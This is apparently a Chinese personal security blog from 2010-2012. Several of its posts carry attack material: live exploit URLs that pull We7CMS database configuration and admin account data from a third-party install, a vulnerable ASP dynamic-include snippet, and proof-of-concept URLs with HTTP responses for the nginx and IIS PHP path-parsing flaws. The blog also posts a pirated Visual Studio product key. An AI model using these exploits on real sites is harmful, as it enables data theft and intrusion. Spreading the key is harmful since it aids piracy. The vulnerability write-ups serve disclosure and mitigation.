Bin's Blog

We7CMS多处设计缺陷 EXP

master@rootkit.net.cn(Bin) — Wed,01 Feb 2012 19:58:44 +0800

缺陷编号： WooYun-2012-03997
漏洞标题： We7CMS多处设计缺陷
相关厂商：西部动力
漏洞作者： kobin97
提交时间： 2012-02-01
公开时间： 2012-02-01
漏洞类型：设计缺陷/逻辑错误
危害等级：高
自评Rank： 10
漏洞状态：未联系到厂商或者厂商积极忽略
漏洞来源： http://www.wooyun.org/bugs/wooyun-2010-03997

PS: Do it like this , 这个程序员蛋疼呢！

Get DBConfig : http://rootkit.net.cn/exp/we7exp.aspx?getconfig=http://qy3.we7.cn/Install/InstallWebService.asmx

Get UserInfo : http://rootkit.net.cn/exp/we7exp.aspx?getuserurl=http://qy3.we7.cn/Install/AccountWebService.asmx&getusername=admin

ASP中可能出现的一种包含漏洞(Server.execute)

master@rootkit.net.cn(Bin) — Sun,27 Feb 2011 16:08:10 +0800

复制内容到剪贴板程序代码

<%
Server.execute(request("file"))
%>

与include的区别，它可以动态包含文件。
被包含文件里面可执行ASP代码，在国外的源码中有使用的。

更新Reverse-IP Tools

master@rootkit.net.cn(Bin) — Thu,24 Feb 2011 02:11:56 +0800

最近BUG频出，抽点时间改进了下，算法上做了调整，虽然查询时间可能会比以前长，但是质量会提高很多，由于各方面的条件原因，Reverse-IP Tools 不支持网段批量查询，资源有限，请大家珍惜，谢谢您的支持。

解决火狐浏览器(FireFox)访问ASPX自动弹出下载框的BUG

master@rootkit.net.cn(Bin) — Fri,17 Sep 2010 22:54:34 +0800

进入:C:\Documents and Settings\当前用户名\Application Data\Mozilla\Firefox\Profiles下面有一个文件夹
一般就是default.或是以default结尾的。继续进入
找到：mimeTypes.rdf 删除.
重启firefox 即可

经测试可以行！

KillQQAd V1.0.0.48 For QQ2010正式版 SP2.2

master@rootkit.net.cn(Bin) — Mon,28 Jun 2010 02:03:55 +0800

V1.0.0.58

    * 增加了本地缓存功能，获取好友IP信息后，重启QQ也不会丢失
    * IP窗口宽度自适应IP信息长度，不会出现显示不全的问题
    * IP窗口全透明，不会出现QQ聊天窗口背景被遮挡的问题
    * 仅兼容"腾讯QQ 2010 正式版 SP2.2"

KillQQAd V1.0.0.58

MSDN VS2010 Ultimate 简体中文正式版

master@rootkit.net.cn(Bin) — Wed,02 Jun 2010 23:00:51 +0800

MSDN VS2010 Ultimate 简体中文正式版

MSDN Professional + Key(简体中文版本)

MSDN Ultimate + Key(简体中文版本)

MSDN Team Foundation Server + Key(简体中文版本)

MSDN Team Foundation Server + Key(繁體中文版本)

MSDN Ultimate + Key(繁體中文版本)

MSDN Professional + Key(英文版本)

MSDN Ultimate + Key(英文版本)

MSDN Premium + Key(英文版本)

MSDN Express + Key(英文版本)

MSDN Team Foundation Server + Key(英文版本)

IIS源码泄露及文件类型解析错误

master@rootkit.net.cn(Bin) — Fri,21 May 2010 17:39:41 +0800

漏洞介绍：IIS是微软推出的一款webserver，使用较为广泛，在支持asp/asp.net的同时还可以较好的支持PHP等其他语言的运行。但是80sec发现在IIS的较高版本中存在一个比较严重的安全问题，在按照网络上提供的默认配置情况下可能导致服务器泄露服务器端脚本源码，也可能错误的将任何类型的文件以PHP的方式进行解析，使得恶意的攻击者可能攻陷支持PHP的IIS服务器，特别是虚拟主机用户可能受的影响较大。

漏洞分析：
IIS支持以CGI的方式运行PHP，但是此种模式下，IIS处理请求的时候可能导致一些同80sec提到的nginx安全漏洞一样的问题，任何用户可以远程将任何类型的文件以PHP的方式去解析，你可以通过查看Phpinfo中对php的支持方式，其中如果为CGI/FAST-CGI就可能存在这个问题。

黑盒访问

http://www.80sec.com/robots.txt/1.php

查看文件是否存在和返回的HTTP头就可以知道是否存在此漏洞。

同时，如果服务器支持了PHP，但应用中使用的是asp就可以通过如下方式来直接查看服务端asp源码

http://www.80sec.com/some.asp/1.php

漏洞厂商：http://www.microsoft.com

解决方案：

我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0

nginx文件类型错误解析漏洞

master@rootkit.net.cn(Bin) — Fri,21 May 2010 17:38:28 +0800

漏洞介绍：nginx是一款高性能的web服务器，使用非常广泛，其不仅经常被用作反向代理，也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题，默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析，这将导致严重的安全问题，使得恶意的攻击者可能攻陷支持php的nginx服务器。

漏洞分析：nginx默认以cgi的方式支持php的运行，譬如在配置文件当中可以以

location ~ \.php$ {
root html;
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
fastcgi_param SCRIPT_FILENAME /scripts$fastcgi_script_name;
include fastcgi_params;
}

的方式支持对php的解析，location对请求进行选择的时候会使用URI环境变量进行选择，其中传递到后端Fastcgi的关键变量 SCRIPT_FILENAME由nginx生成的$fastcgi_script_name决定，而通过分析可以看到$fastcgi_script_name是直接由URI环境变量控制的，这里就是产生问题的点。而为了较好的支持PATH_INFO的提取，在PHP 的配置选项里存在cgi.fix_pathinfo选项，其目的是为了从SCRIPT_FILENAME里取出真正的脚本名。
那么假设存在一个http://www.80sec.com/80sec.jpg，我们以如下的方式去访问

http://www.80sec.com/80sec.jpg/80sec.php

将会得到一个URI

/80sec.jpg/80sec.php

经过location指令，该请求将会交给后端的fastcgi处理，nginx为其设置环境变量SCRIPT_FILENAME，内容为

/scripts/80sec.jpg/80sec.php

而在其他的webserver如lighttpd当中，我们发现其中的SCRIPT_FILENAME被正确的设置为

/scripts/80sec.jpg

所以不存在此问题。
后端的fastcgi在接受到该选项时，会根据fix_pathinfo配置决定是否对SCRIPT_FILENAME进行额外的处理，一般情况下如果不对fix_pathinfo进行设置将影响使用PATH_INFO进行路由选择的应用，所以该选项一般配置开启。Php通过该选项之后将查找其中真正的脚本文件名字，查找的方式也是查看文件是否存在，这个时候将分离出SCRIPT_FILENAME和PATH_INFO分别为

/scripts/80sec.jpg和80sec.php

最后，以/scripts/80sec.jpg作为此次请求需要执行的脚本，攻击者就可以实现让nginx以php来解析任何类型的文件了。

POC：访问一个nginx来支持php的站点，在一个任何资源的文件如robots.txt后面加上/80sec.php，这个时候你可以看到如下的区别：

访问http://www.80sec.com/robots.txt

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

访问访问http://www.80sec.com/robots.txt/80sec.php

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
X-Powered-By: PHP/5.2.6

其中的Content-Type的变化说明了后端负责解析的变化，该站点就可能存在漏洞。

漏洞厂商：http://www.nginx.org

解决方案：

我们已经尝试联系官方，但是此前你可以通过以下的方式来减少损失

关闭cgi.fix_pathinfo为0

或者

if ( $fastcgi_script_name ~ \..*\/.*php ) {
return 403;
}

PS: 鸣谢laruence大牛在分析过程中给的帮助

IIS7运行WCF服务出现404错误的解决方法

master@rootkit.net.cn(Bin) — Wed,28 Apr 2010 20:02:59 +0800

错误页面如下，出现这个问题，很大的可能是在iis中没有正确的配置WCF服务，解决的办法也很简单
使用 %Windows%\Microsoft.Net\Framework\v3.0\Windows Communication Foundation目录下的ServiceModelReg.exe程序就好了

首先检测服务状态：
命令: ServiceModelReg -vi
结果: 如果协议都是“未安装”状态则可以确定是WCF在IIS中没有正确安装

接着安装服务：
命令: ServiceModelReg -i
结果: 如果成功安装，会返回成功信息

重启IIS，解决！

Visual Studio 2010专业、高级、旗舰三种版本的正式版（下载）

master@rootkit.net.cn(Bin) — Wed,14 Apr 2010 21:03:01 +0800

Visual Studio是微软公司推出的目前最为流行的Windows平台应用程序开发环境。从Visual Studio的第一个版本开始，微软就将提高开发人员的工作效率和灵活性作为研发目标。使用具有更多新特性的最新版本Visual Studio 2010，即可非常有效地在新一代应用平台上为客户创造令人惊奇的解决方案。现提供Visual Studio 2010专业、高级、旗舰三个版本的简要介绍、官方下载，以及旗舰版升级密钥如下——

    Visual Studio 2010具有五大特性：支持云计算架构；Agile/Scrum开发方法；兼容Windows 7与Silverlight 4；发挥多核并行运算威力；能够更好地支持C++。

(一)专业版

    面向个人开发人员提供集成开发环境、开发平台支持以及测试工具等。其中带有MSDN Essential(有效期一年的MSDN订阅)的完整版售价799美元、升级版售价549美元；带有MSDN订阅的完整版售价1199美元、升级版售价 799美元。

    微软官方下载地址：Microsoft Visual Studio 2010 Professional - ISO

(二)高级版

    创建可扩展、高质量程序的完整工具包，相比专业版增加了数据库开发、Team Foundation Server(TFS)、调试与诊断、程序生命周期管理(ALM)。完整版售价5469美元，升级版售价2299美元。

    微软官方下载地址：Microsoft Visual Studio 2010 Premium - ISO

(三)旗舰版

    面向开发团队的综合性ALM工具，相比高级版增加了架构与建模、实验室管理等。完整版售价11899美元，升级版售价3799美元。

    微软官方下载地址：Microsoft Visual Studio 2010 Ultimate - ISO

    安装完毕后，在卸载程序中进入维护模式，用YCFHQ-9DWCY-DKV88-T2TMH-G7BHP升级即可。

附一：Microsoft .NET Framework 4(Web Installer) 微软官方下载地址

    提供了对更多业界标准、语言选项的支持。新增支持包括并行编程在内的高性能中间层应用。Microsoft .NET Framework 4可与Microsoft .NET Framework 3.5并存。

附二：Microsoft Visual C++ 2010 Redistributable Package 微软官方下载地址

    本程序包为C运行时库(CRT)、标准C++、ATL、MFC、OpenMP和MSDIA库安装运行时组件。对于支持并行部署模型的库(CRT、SCL、 ATL、MFC、OpenMP)，这些运行时组件被安装到：支持并行程序集的Windows操作系统的本机程序集缓存(也称为 WinSxS文件夹)中。